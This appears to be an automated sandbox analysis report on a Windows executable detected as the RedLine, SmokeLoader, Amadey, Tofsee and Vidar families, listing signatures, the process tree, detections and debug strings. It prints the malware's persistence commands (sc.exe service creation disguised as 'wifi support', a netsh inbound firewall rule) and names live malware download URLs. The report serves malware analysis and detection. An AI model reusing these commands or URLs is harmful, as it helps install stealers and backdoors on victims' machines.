
Windows Analysis Report 6zsU4O4WHq.exe

Overview

General Information

Sample Name: 6zsU4O4WHq.exe
Analysis ID: 553166
MD5: 8abe3174cfd23abb63418dfa64109c7c
SHA1: 6370245ac968e309d2916ac9d999797a479b77e4
SHA256: 93fddb1a745fec7ae8bc3a7f8d66ce73b1841998e9b0589790e924ff6efb6a05
Tags: exe, RedLineStealer

Detection

Amadey, RedLine, SmokeLoader, Tofsee, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Drops executables to the windows directory (C:\Windows) and starts them
Checks if the current machine is a virtual machine (disk enumeration)
Sample uses process hollowing technique
Writes to foreign memory regions
.NET source code references suspicious native API functions
Changes security center settings (notifications, updates, antivirus, firewall)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Found evaded block containing many API calls
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • 6zsU4O4WHq.exe (PID: 6264 cmdline: "C:\Users\user\Desktop\6zsU4O4WHq.exe" MD5: 8ABE3174CFD23ABB63418DFA64109C7C)
    • 6zsU4O4WHq.exe (PID: 6292 cmdline: "C:\Users\user\Desktop\6zsU4O4WHq.exe" MD5: 8ABE3174CFD23ABB63418DFA64109C7C)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 8F12.exe (PID: 4564 cmdline: C:\Users\user\AppData\Local\Temp\8F12.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 6824 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 216 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • ADC7.exe (PID: 4676 cmdline: C:\Users\user\AppData\Local\Temp\ADC7.exe MD5: E1AF41681888A847863EE17BD63450A0)
        • D08E.exe (PID: 5640 cmdline: C:\Users\user\AppData\Local\Temp\D08E.exe MD5: E4B33586BFDB5A9CD45F3038B8F4CCBD)
          • cmd.exe (PID: 5824 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\kxbxjngj\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 644 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lsjsgslc.exe" C:\Windows\SysWOW64\kxbxjngj\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 3296 cmdline: C:\Windows\System32\sc.exe" create kxbxjngj binPath= "C:\Windows\SysWOW64\kxbxjngj\lsjsgslc.exe /d\"C:\Users\user\AppData\Local\Temp\D08E.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 6080 cmdline: C:\Windows\System32\sc.exe" description kxbxjngj "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 6532 cmdline: "C:\Windows\System32\sc.exe" start kxbxjngj MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • netsh.exe (PID: 6692 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 1012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • E09C.exe (PID: 5592 cmdline: C:\Users\user\AppData\Local\Temp\E09C.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
  • svchost.exe (PID: 6548 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6660 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6856 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6960 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7080 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 7136 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 7156 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6760 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • svchost.exe (PID: 7000 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • bahuseh (PID: 5920 cmdline: C:\Users\user\AppData\Roaming\bahuseh MD5: 8ABE3174CFD23ABB63418DFA64109C7C)
    • bahuseh (PID: 4512 cmdline: C:\Users\user\AppData\Roaming\bahuseh MD5: 8ABE3174CFD23ABB63418DFA64109C7C)
  • svchost.exe (PID: 2372 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 4204 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4564 -ip 4564 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6840 cmdline: werfault.exe /h /shared Global\80ecccd770424135ad1b1b19d8526adb /t 1684 /p 1612 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • svchost.exe (PID: 5852 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • lsjsgslc.exe (PID: 6760 cmdline: C:\Windows\SysWOW64\kxbxjngj\lsjsgslc.exe /d"C:\Users\user\AppData\Local\Temp\D08E.exe" MD5: 12C7D1AC6B5167E6CDA092CD7B7313A1)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security |
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
0000001D.00000002.410123291.0000000000630000.00000040.00000001.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
0000002E.00000002.415135073.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
0000001F.00000002.448023169.0000000003A31000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0000001D.00000002.409713162.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
00000015.00000002.370380414.00000000004A0000.00000004.00000001.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
(15 entries in the full report; first 5 shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
21.1.bahuseh.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
21.0.bahuseh.400000.5.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
21.0.bahuseh.400000.4.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
31.2.E09C.exe.3b4f910.1.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
21.2.bahuseh.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
(16 entries in the full report; first 5 shown)

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity
Source: Process started; Author: David Burkett; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, ParentImage: C:\Windows\System32\svchost.exe, ParentProcessId: 6760, ProcessCommandLine: svchost.exe, ProcessId: 7000
Sigma detected: Copying Sensitive Files with Credential Data
Source: Process started; Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community; Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lsjsgslc.exe" C:\Windows\SysWOW64\kxbxjngj\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lsjsgslc.exe" C:\Windows\SysWOW64\kxbxjngj\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\D08E.exe, ParentImage: C:\Users\user\AppData\Local\Temp\D08E.exe, ParentProcessId: 5640, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lsjsgslc.exe" C:\Windows\SysWOW64\kxbxjngj\, ProcessId: 644
Sigma detected: Netsh Port or Application Allowed
Source: Process started; Author: Markus Neis, Sander Wiebing; Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\D08E.exe, ParentImage: C:\Users\user\AppData\Local\Temp\D08E.exe, ParentProcessId: 5640, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 6692
Sigma detected: New Service Creation
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: C:\Windows\System32\sc.exe" create kxbxjngj binPath= "C:\Windows\SysWOW64\kxbxjngj\lsjsgslc.exe /d\"C:\Users\user\AppData\Local\Temp\D08E.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create kxbxjngj binPath= "C:\Windows\SysWOW64\kxbxjngj\lsjsgslc.exe /d\"C:\Users\user\AppData\Local\Temp\D08E.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\D08E.exe, ParentImage: C:\Users\user\AppData\Local\Temp\D08E.exe, ParentProcessId: 5640, ProcessCommandLine: C:\Windows\System32\sc.exe" create kxbxjngj binPath= "C:\Windows\SysWOW64\kxbxjngj\lsjsgslc.exe /d\"C:\Users\user\AppData\Local\Temp\D08E.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 3296

                          Jbx Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://185.7.214.171:8080/6.php; URL Reputation: Label: malware
Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exe; Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/8474_1641976243_3082.exe; Avira URL Cloud: Label: malware
Source: http://unicupload.top/install5.exe; URL Reputation: Label: phishing
Source: http://data-host-coin-8.com/files/7729_1642101604_1835.exe; Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exe; Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\E09C.exe; Avira: detection malicious, Label: HEUR/AGEN.1211353
Source: C:\Users\user\AppData\Local\Temp\lsjsgslc.exe; Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Multi AV Scanner detection for submitted file
Source: 6zsU4O4WHq.exe; ReversingLabs: Detection: 51%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\52A0.exe; Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\52A0.exe; ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\6687.exe; Metadefender: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\6687.exe; ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\8F12.exe; Metadefender: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\8F12.exe; ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\9991.exe; Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\9991.exe; ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\A5E6.exe; ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\ADC7.exe; ReversingLabs: Detection: 44%
Machine Learning detection for sample
Source: 6zsU4O4WHq.exe; Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\6687.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8F12.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\D08E.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9991.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A5E6.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\74E0.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8E93.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B299.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ADC7.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\52A0.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\bahuseh; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\E09C.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\lsjsgslc.exe; Joe Sandbox ML: detected

Source: 46.2.lsjsgslc.exe.700000.2.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 26.2.ADC7.exe.630e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 29.3.D08E.exe.650000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 46.2.lsjsgslc.exe.630e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 46.3.lsjsgslc.exe.650000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 26.3.ADC7.exe.650000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 29.2.D08E.exe.400000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 46.2.lsjsgslc.exe.400000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 29.2.D08E.exe.630e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen

Source: C:\Users\user\AppData\Local\Temp\ADC7.exe; Code function: 26_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,26_2_00407470
Source: C:\Users\user\AppData\Local\Temp\ADC7.exe; Code function: 26_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,26_2_00404830
Source: C:\Users\user\AppData\Local\Temp\ADC7.exe; Code function: 26_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,26_2_00407510
Source: C:\Users\user\AppData\Local\Temp\ADC7.exe; Code function: 26_2_00407190 CryptUnprotectData,26_2_00407190
Source: C:\Users\user\AppData\Local\Temp\ADC7.exe; Code function: 26_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,26_2_004077A0

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\ADC7.exe; Unpacked PE file: 26.2.ADC7.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\D08E.exe; Unpacked PE file: 29.2.D08E.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\kxbxjngj\lsjsgslc.exe; Unpacked PE file: 46.2.lsjsgslc.exe.400000.0.unpack

Source: 6zsU4O4WHq.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\8F12.exe; File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown; HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.5:49780 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.5:49799 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.5:49874 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49876 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49884 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49892 version: TLS 1.2
                          Source: Binary string: profapi.pdb source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 8F12.exe, 00000016.00000000.359364135.0000000000413000.00000002.00020000.sdmp, 8F12.exe, 00000016.00000002.441134145.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.439030652.00000000057A0000.00000002.00020000.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp
                          Source: Binary string: shlwapi.pdb+ source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001B.00000003.377733738.00000000037D5000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.377681663.0000000005358000.00000004.00000001.sdmp
                          Source: Binary string: sechost.pdb source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp
                          Source: Binary string: C:\josixeyad jeveyoso.pdbh source: 6zsU4O4WHq.exe, 00000000.00000002.248050134.0000000000401000.00000020.00020000.sdmp, 6zsU4O4WHq.exe, 00000000.00000000.241744506.0000000000401000.00000020.00020000.sdmp, 6zsU4O4WHq.exe, 00000001.00000000.246119429.0000000000401000.00000020.00020000.sdmp, bahuseh, 00000014.00000002.358671480.0000000000401000.00000020.00020000.sdmp, bahuseh, 00000014.00000000.342877581.0000000000401000.00000020.00020000.sdmp, bahuseh, 00000015.00000000.348070416.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: profapi.pdb- source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001B.00000003.379398442.00000000037CF000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.377717330.00000000037CF000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdb source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: C:\fuzobeficepo\fiwasito\cat45\yivo.pdbh source: ADC7.exe, 0000001A.00000000.369687028.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: C:\josixeyad jeveyoso.pdb source: 6zsU4O4WHq.exe, 6zsU4O4WHq.exe, 00000000.00000002.248050134.0000000000401000.00000020.00020000.sdmp, 6zsU4O4WHq.exe, 00000000.00000000.241744506.0000000000401000.00000020.00020000.sdmp, 6zsU4O4WHq.exe, 00000001.00000000.246119429.0000000000401000.00000020.00020000.sdmp, bahuseh, 00000014.00000002.358671480.0000000000401000.00000020.00020000.sdmp, bahuseh, 00000014.00000000.342877581.0000000000401000.00000020.00020000.sdmp, bahuseh, 00000015.00000000.348070416.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp
                          Source: Binary string: LC:\tiroducelidayu\citakuyar\g.pdbh source: D08E.exe, 0000001D.00000002.411850614.00000000008E2000.00000004.00000001.sdmp, D08E.exe, 0000001D.00000000.379013027.0000000000401000.00000020.00020000.sdmp, lsjsgslc.exe, 0000002E.00000000.409757836.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: combase.pdb! source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: C:\tiroducelidayu\citakuyar\g.pdb source: D08E.exe, 0000001D.00000002.411850614.00000000008E2000.00000004.00000001.sdmp, D08E.exe, 0000001D.00000000.379013027.0000000000401000.00000020.00020000.sdmp, lsjsgslc.exe, 0000002E.00000000.409757836.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 0000001B.00000003.387408043.0000000005786000.00000004.00000040.sdmp
                          Source: Binary string: C:\fuzobeficepo\fiwasito\cat45\yivo.pdb source: ADC7.exe, 0000001A.00000000.369687028.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001B.00000003.387381998.0000000005780000.00000004.00000040.sdmp
                          Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000001B.00000003.377733738.00000000037D5000.00000004.00000001.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001B.00000003.387340023.0000000005671000.00000004.00000001.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 8F12.exe, 00000016.00000000.359364135.0000000000413000.00000002.00020000.sdmp, 8F12.exe, 00000016.00000002.441134145.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.439030652.00000000057A0000.00000002.00020000.sdmp
                          Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000001B.00000003.379398442.00000000037CF000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.377717330.00000000037CF000.00000004.00000001.sdmp
